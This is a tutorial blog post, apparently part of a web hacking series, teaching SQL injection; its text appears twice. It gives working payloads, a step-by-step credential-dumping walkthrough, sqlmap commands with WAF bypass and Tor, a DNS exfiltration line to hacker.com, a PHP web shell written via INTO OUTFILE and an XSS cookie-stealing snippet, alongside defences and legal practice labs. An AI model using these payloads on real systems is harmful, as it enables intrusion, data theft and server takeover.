[upl-image-preview uuid=d621e696-0b4c-4c58-9584-c9b030cb599e url=https://hacklivly.com/assets/files/2025-03-04/1741081207-573294-web-hacking-part-3.png alt={TEXT?}] **Hey guys, Rocky here!** 💉🔍 Welcome to **Day 3** of the *Daily Web Hacking* series! We’ve covered [HTTP Basics](https://hacklivly.com/blog/35-web-hacking-series-part-1-http-basics-the-invisible-language-of-the-web) and [Reconnaissance](https://hacklivly.com/blog/36-web-hacking-series-part-2-reconnaissance-mapping-your-target-like-a-spy). Now, let’s dive into **Part 3: SQL Injection (SQLi)**—the hack that turns a harmless quote (`'`) into a database-destroying weapon. 🧨 SQLi isn’t just a buzzword; it’s a *superpower* in the wrong hands. By the end of this guide, you’ll know how to exploit it, defend against it, and why it’s still the web’s boogeyman in 2024. Let’s get messy! --- ### **What is SQL Injection?** Imagine a librarian (the database) who blindly follows any command you shout at them. SQLi is very much like requesting them to provide you with all the books in the library instead of the book you need. **Technically**: SQLi lets attackers inject malicious SQL code into a website’s database query. This can: * Steal data (emails, passwords, credit cards). * Delete or corrupt databases. * Hijack the entire server. **Why it’s scary**: * **#1 vulnerability** in the OWASP Top 10 for decades. * Requires *minimal skill* but causes *maximum damage*. * **35% of web apps** are still vulnerable ([OWASP, 2021](https://owasp.org/www-project-top-ten/)). --- ### **SQL 101: The Language of Databases** SQL (**S**tructured **Q**uery **L**anguage) is how websites interact with databases. Let’s break down a basic login query: ```sql SELECT * FROM users WHERE username = 'rocky' AND password = 'Sup3rSecret!'; ``` This asks the database: *“Show me all users where the username is ‘rocky’ and the password is ‘Sup3rSecret!’”* If the input fields aren’t sanitized (cleaned), a hacker can **inject** code into the query. Let’s see how. --- ### **The Attack: Turning a Quote (`'`) into a Weapon** Here’s a classic SQLi attack on a login form: 1. **Username**: `' OR 1=1 --` 2. **Password**: *[Anything]* The database then runs: ```sql SELECT * FROM users WHERE username = '' OR 1=1 --' AND password = 'anything'; ``` **What’s happening here?** * `'` closes the username field early. * `OR 1=1` is always true, so the query returns *all users*. * `--` comments out the rest of the query (ignoring the password check). **Result**: You’re logged in as the first user in the database (often an admin). --- ### **Types of SQL Injection** Not all SQLi is created equal. Here’s how attackers adapt: #### **1. Error-Based SQLi (The Loud Attack)** * **Goal**: Crash the query and leak data via error messages. * **Example**: ```sql ' UNION SELECT 1,@@version,3 -- ``` * `UNION SELECT` merges results from another query. * `@@version` fetches the database version (e.g., *“MySQL 5.7.34”*). **Use Case**: Quickly fingerprint the database to find exploits. #### **2. Blind SQLi (The Silent Attack)** * **Scenario**: The site shows no errors. You ask “yes/no” questions. * **Example**: ```sql ' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE id=1) = 'a' -- ``` * If the page loads normally, the first character of the admin’s password is **a**. * Repeat for each character (slow but effective). **Use Case**: Stealing data when errors are hidden. #### **3. Time-Based SQLi (The Patient Attack)** * **How**: Use delays to confirm vulnerabilities. * **Example**: ```sql '; IF (1=1) WAITFOR DELAY '0:0:5' -- ``` * If the page takes **5 seconds** to load, the database is vulnerable. **Use Case**: Testing for SQLi without visible feedback. --- ### **Real-World SQLi Disasters** SQLi isn’t theoretical—it’s cost companies millions: 1. **Sony Pictures (2011)**: * **Hack**: SQLi leaked 77 million user details. * **Fallout**: Lawsuits, leaked emails, and *The Interview* movie scandal. 2. **Heartland Payment Systems (2008)**: * **Hack**: 134 million credit cards stolen via SQLi. * **Cost**: $140 million in fines. 3. **TalkTalk (2015)**: * **Hack**: 157k customer records stolen. * **Aftermath**: £60 million loss, CEO resignation. **Lesson**: A single quote can bankrupt a company. --- ### **Step-by-Step SQLi Exploitation** Let’s walk through hacking a vulnerable site: #### **1. Find a Vulnerable Input** * Look for URL parameters, forms, or cookies. * Example URL: `https://hacklivly.com/products?id=1` #### **2. Test for Vulnerability** * Add a quote (`'`) to the input: ``` https://hacklivly.com/products?id=1' ``` * If you see an error like *“You have an error in your SQL syntax”*, it’s vulnerable. #### **3. Determine the Number of Columns** * Use `ORDER BY` to find the column count: ``` https://hacklivly.com/products?id=1' ORDER BY 5 -- ``` * Increase the number until you get an error (e.g., `ORDER BY 5` fails but `ORDER BY 4` works → 4 columns). #### **4. Extract Data with UNION Attacks** * Use `UNION SELECT` to retrieve data: ``` https://hacklivly.com/products?id=1' UNION SELECT 1,@@version,user(),4 -- ``` * `@@version`: Database version. * `user()`: Current database user. #### **5. Steal the Database** * **Dump table names**: ``` https://hacklivly.com/products?id=1' UNION SELECT 1,table_name,3,4 FROM information_schema.tables -- ``` * **Dump column names**: ``` https://hacklivly.com/products?id=1' UNION SELECT 1,column_name,3,4 FROM information_schema.columns WHERE table_name='users' -- ``` * **Steal credentials**: ``` https://hacklivly.com/products?id=1' UNION SELECT 1,username,password,4 FROM users -- ``` **Pro Tip**: Use `GROUP_CONCAT()` to combine results (e.g., `GROUP_CONCAT(table_name)`). --- ### **Automating SQLi with sqlmap** Manual SQLi is fun, but **sqlmap** automates the grunt work. Here’s how: #### **1. Install sqlmap** ```bash git clone https://github.com/sqlmapproject/sqlmap.git ``` #### **2. Basic Scan** ```bash sqlmap -u "https://hacklivly.com/products?id=1" ``` * **Output**: Identifies injectable parameters and database type. #### **3. Dump Everything** ```bash sqlmap -u "https://hacklivly.com/products?id=1" --dump-all ``` * **Result**: Downloads the entire database. #### **Advanced sqlmap Flags** * **Bypass WAFs**: Use tamper scripts like `tamper=between,randomcase`. * **Stealth Mode**: Slow down requests with `--delay=2`. * **Stay Anonymous**: Route traffic through Tor with `--tor`. **Example**: ```bash sqlmap -u "https://hacklivly.com/products?id=1" --tamper=space2comment --level=5 --risk=3 ``` --- ### **Defending Against SQLi** Developers can block SQLi with: #### **1. Parameterized Queries** * **Never** concatenate user input into queries. * **Instead**, use placeholders: **Python (SQLite)**: ```python cursor.execute("SELECT * FROM users WHERE username = ? AND password = ?", (username, password)) ``` **PHP (PDO)**: ```php $stmt = $pdo->prepare("SELECT * FROM users WHERE username = :username AND password = :password"); $stmt->execute(['username' => $username, 'password' => $password]); ``` #### **2. Input Validation** * Block special characters like `'`, `"`, and `;`. * Use allowlists (e.g., only allow letters/numbers in usernames). #### **3. Web Application Firewalls (WAF)** * Tools like **Cloudflare**, **ModSecurity**, or **AWS WAF** block malicious payloads. #### **4. Least Privilege** * Run the database with a restricted user account (no `DROP TABLE` permissions). --- ### **Practice SQLi Legally** **1. DVWA (Damn Vulnerable Web App)**: ```bash docker run --rm -it -p 80:80 vulnerables/web-dvwa ``` * Navigate to `http://localhost`, log in with `admin/password`. * Practice in the **SQL Injection** module. **2. PortSwigger’s Web Security Academy**: * Free labs at [portswigger.net](https://portswigger.net/web-security/sql-injection). **3. Hack The Box**: * Challenges like **Jerry** (Windows) or **Nibbles** (Linux) include SQLi. --- ### **Beyond Basic SQLi: Advanced Tactics** #### **1. Second-Order SQLi** * **Scenario**: Injected code triggers later (e.g., during a password reset). * **Example**: * Sign up with username `admin' --`. * Later, the app runs: ```sql UPDATE users SET password='newpass' WHERE username='admin' --'; ``` * **Result**: The admin’s password is changed. #### **2. Out-of-Band SQLi** * **Use Case**: When the server doesn’t return results directly. * **Exfiltrate Data via DNS**: ```sql '; EXEC xp_dirtree "\\hacker.com\stolen_data"; -- ``` * The server sends a DNS request to `hacker.com`, leaking data in the subdomain. #### **3. SQLi to RCE (Remote Code Execution)** * **Example (MySQL)**: ```sql '; SELECT "" INTO OUTFILE "/var/www/html/shell.php" -- ``` * Uploads a PHP shell to execute OS commands. --- ### **Ethical Hacking & Responsible Disclosure** **Never** attack a site without permission. If you find a vulnerability: 1. **Document it**: Record steps to reproduce. 2. **Report it**: Use the site’s contact form or bug bounty program (e.g., HackerOne). 3. **Disclose responsibly**: Give the company time to fix it before going public. --- ### **What’s Next? Part 4: Cross-Site Scripting (XSS)** Tomorrow, we’ll explore **XSS**—injecting malicious scripts to hijack browsers. Sneak peek: ```html fetch('https://hacker.com/steal?cookie=' + document.cookie); ``` --- ### **Final Thoughts** SQLi is a hacker’s Swiss Army knife—simple, versatile, and devastating. But with great power comes great responsibility. Use this knowledge ethically, and always secure your own apps. **Remember**: The difference between a hacker and a criminal is *permission*. **Rocky signing off!** ✌️ --- **P.S.** If you’re enjoying this series, share it with your squad! Let’s turn script kiddies into security pros. **Discussion Question**: What’s the wildest thing you’ve found in a database? I once found a table named `passwords_do_not_open`… and it was unencrypted. 😬 Spill your stories below! 👇

Web Hacking - Part 3: SQL Injection 🔥

rocky

Hey guys, Rocky here! 💉🔍

Welcome to Day 3 of the Daily Web Hacking series! We’ve covered HTTP Basics and Reconnaissance. Now, let’s dive into Part 3: SQL Injection (SQLi)—the hack that turns a harmless quote (') into a database-destroying weapon. 🧨

SQLi isn’t just a buzzword; it’s a superpower in the wrong hands. By the end of this guide, you’ll know how to exploit it, defend against it, and why it’s still the web’s boogeyman in 2024. Let’s get messy!

—

What is SQL Injection?

Imagine a librarian (the database) who blindly follows any command you shout at them. SQLi is very much like requesting them to provide you with all the books in the library instead of the book you need.

Technically: SQLi lets attackers inject malicious SQL code into a website’s database query. This can:

Steal data (emails, passwords, credit cards).
Delete or corrupt databases.
Hijack the entire server.

Why it’s scary:

#1 vulnerability in the OWASP Top 10 for decades.
Requires minimal skill but causes maximum damage.
35% of web apps are still vulnerable (OWASP, 2021).

—

SQL 101: The Language of Databases

SQL (Structured Query Language) is how websites interact with databases. Let’s break down a basic login query:

SELECT * FROM users WHERE username = 'rocky' AND password = 'Sup3rSecret!';

This asks the database: “Show me all users where the username is ‘rocky’ and the password is ‘Sup3rSecret!’”

If the input fields aren’t sanitized (cleaned), a hacker can inject code into the query. Let’s see how.

—

The Attack: Turning a Quote (`'`) into a Weapon

Here’s a classic SQLi attack on a login form:

Username: ' OR 1=1 --
Password: [Anything]

The database then runs:

SELECT * FROM users WHERE username = '' OR 1=1 --' AND password = 'anything';

What’s happening here?

' closes the username field early.
OR 1=1 is always true, so the query returns all users.
-- comments out the rest of the query (ignoring the password check).

Result: You’re logged in as the first user in the database (often an admin).

—

Types of SQL Injection

Not all SQLi is created equal. Here’s how attackers adapt:

1. Error-Based SQLi (The Loud Attack)

Goal: Crash the query and leak data via error messages.

Example:

  ' UNION SELECT 1,@@version,3 --

UNION SELECT merges results from another query.
@@version fetches the database version (e.g., “MySQL 5.7.34”).

Use Case: Quickly fingerprint the database to find exploits.

2. Blind SQLi (The Silent Attack)

Scenario: The site shows no errors. You ask “yes/no” questions.

Example:

  ' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE id=1) = 'a' --

If the page loads normally, the first character of the admin’s password is a.
Repeat for each character (slow but effective).

Use Case: Stealing data when errors are hidden.

3. Time-Based SQLi (The Patient Attack)

How: Use delays to confirm vulnerabilities.

Example:

  '; IF (1=1) WAITFOR DELAY '0:0:5' --

If the page takes 5 seconds to load, the database is vulnerable.

Use Case: Testing for SQLi without visible feedback.

—

Real-World SQLi Disasters

SQLi isn’t theoretical—it’s cost companies millions:

Sony Pictures (2011):
- Hack: SQLi leaked 77 million user details.
- Fallout: Lawsuits, leaked emails, and The Interview movie scandal.
Heartland Payment Systems (2008):
- Hack: 134 million credit cards stolen via SQLi.
- Cost: $140 million in fines.
TalkTalk (2015):
- Hack: 157k customer records stolen.
- Aftermath: £60 million loss, CEO resignation.

Lesson: A single quote can bankrupt a company.

—

Step-by-Step SQLi Exploitation

Let’s walk through hacking a vulnerable site:

1. Find a Vulnerable Input

Look for URL parameters, forms, or cookies.
Example URL: https://hacklivly.com/products?id=1

2. Test for Vulnerability

Add a quote (') to the input:

  https://hacklivly.com/products?id=1'

If you see an error like “You have an error in your SQL syntax”, it’s vulnerable.

3. Determine the Number of Columns

Use ORDER BY to find the column count:

  https://hacklivly.com/products?id=1' ORDER BY 5 --

Increase the number until you get an error (e.g., ORDER BY 5 fails but ORDER BY 4 works → 4 columns).

4. Extract Data with UNION Attacks

Use UNION SELECT to retrieve data:

  https://hacklivly.com/products?id=1' UNION SELECT 1,@@version,user(),4 --

@@version: Database version.
user(): Current database user.

5. Steal the Database

Dump table names:

  https://hacklivly.com/products?id=1' UNION SELECT 1,table_name,3,4 FROM information_schema.tables --

Dump column names:

  https://hacklivly.com/products?id=1' UNION SELECT 1,column_name,3,4 FROM information_schema.columns WHERE table_name='users' --

Steal credentials:

  https://hacklivly.com/products?id=1' UNION SELECT 1,username,password,4 FROM users --

Pro Tip: Use GROUP_CONCAT() to combine results (e.g., GROUP_CONCAT(table_name)).

—

Automating SQLi with sqlmap

Manual SQLi is fun, but sqlmap automates the grunt work. Here’s how:

1. Install sqlmap

git clone https://github.com/sqlmapproject/sqlmap.git

2. Basic Scan

sqlmap -u "https://hacklivly.com/products?id=1"

Output: Identifies injectable parameters and database type.

3. Dump Everything

sqlmap -u "https://hacklivly.com/products?id=1" --dump-all

Result: Downloads the entire database.

Advanced sqlmap Flags

Bypass WAFs: Use tamper scripts like tamper=between,randomcase.
Stealth Mode: Slow down requests with --delay=2.
Stay Anonymous: Route traffic through Tor with --tor.

Example:

sqlmap -u "https://hacklivly.com/products?id=1" --tamper=space2comment --level=5 --risk=3

—

Defending Against SQLi

Developers can block SQLi with:

1. Parameterized Queries

Never concatenate user input into queries.
Instead, use placeholders:

Python (SQLite):

cursor.execute("SELECT * FROM users WHERE username = ? AND password = ?", (username, password))

PHP (PDO):

$stmt = $pdo->prepare("SELECT * FROM users WHERE username = :username AND password = :password");  
$stmt->execute(['username' => $username, 'password' => $password]);

2. Input Validation

Block special characters like ', ", and ;.
Use allowlists (e.g., only allow letters/numbers in usernames).

3. Web Application Firewalls (WAF)

Tools like Cloudflare, ModSecurity, or AWS WAF block malicious payloads.

4. Least Privilege

Run the database with a restricted user account (no DROP TABLE permissions).

—

Practice SQLi Legally

1. DVWA (Damn Vulnerable Web App):

docker run --rm -it -p 80:80 vulnerables/web-dvwa

Navigate to http://localhost, log in with admin/password.
Practice in the SQL Injection module.

2. PortSwigger’s Web Security Academy:

Free labs at portswigger.net.

3. Hack The Box:

Challenges like Jerry (Windows) or Nibbles (Linux) include SQLi.

—

Beyond Basic SQLi: Advanced Tactics

1. Second-Order SQLi

Scenario: Injected code triggers later (e.g., during a password reset).

Example:

Later, the app runs:

    UPDATE users SET password='newpass' WHERE username='admin' --';

Result: The admin’s password is changed.

2. Out-of-Band SQLi

Use Case: When the server doesn’t return results directly.

Exfiltrate Data via DNS:

  '; EXEC xp_dirtree "\\hacker.com\stolen_data"; --

The server sends a DNS request to hacker.com, leaking data in the subdomain.

3. SQLi to RCE (Remote Code Execution)

Example (MySQL):

  '; SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "/var/www/html/shell.php" --

Uploads a PHP shell to execute OS commands.

—

Ethical Hacking & Responsible Disclosure

Never attack a site without permission. If you find a vulnerability:

Document it: Record steps to reproduce.
Report it: Use the site’s contact form or bug bounty program (e.g., HackerOne).
Disclose responsibly: Give the company time to fix it before going public.

—

What’s Next? Part 4: Cross-Site Scripting (XSS)

Tomorrow, we’ll explore XSS—injecting malicious scripts to hijack browsers. Sneak peek:

<script>  
  fetch('https://hacker.com/steal?cookie=' + document.cookie);  
</script>

—

Final Thoughts

SQLi is a hacker’s Swiss Army knife—simple, versatile, and devastating. But with great power comes great responsibility. Use this knowledge ethically, and always secure your own apps.

Remember: The difference between a hacker and a criminal is permission.

Rocky signing off! ✌️

—

P.S. If you’re enjoying this series, share it with your squad! Let’s turn script kiddies into security pros.

Discussion Question: What’s the wildest thing you’ve found in a database? I once found a table named passwords_do_not_open… and it was unencrypted. 😬 Spill your stories below! 👇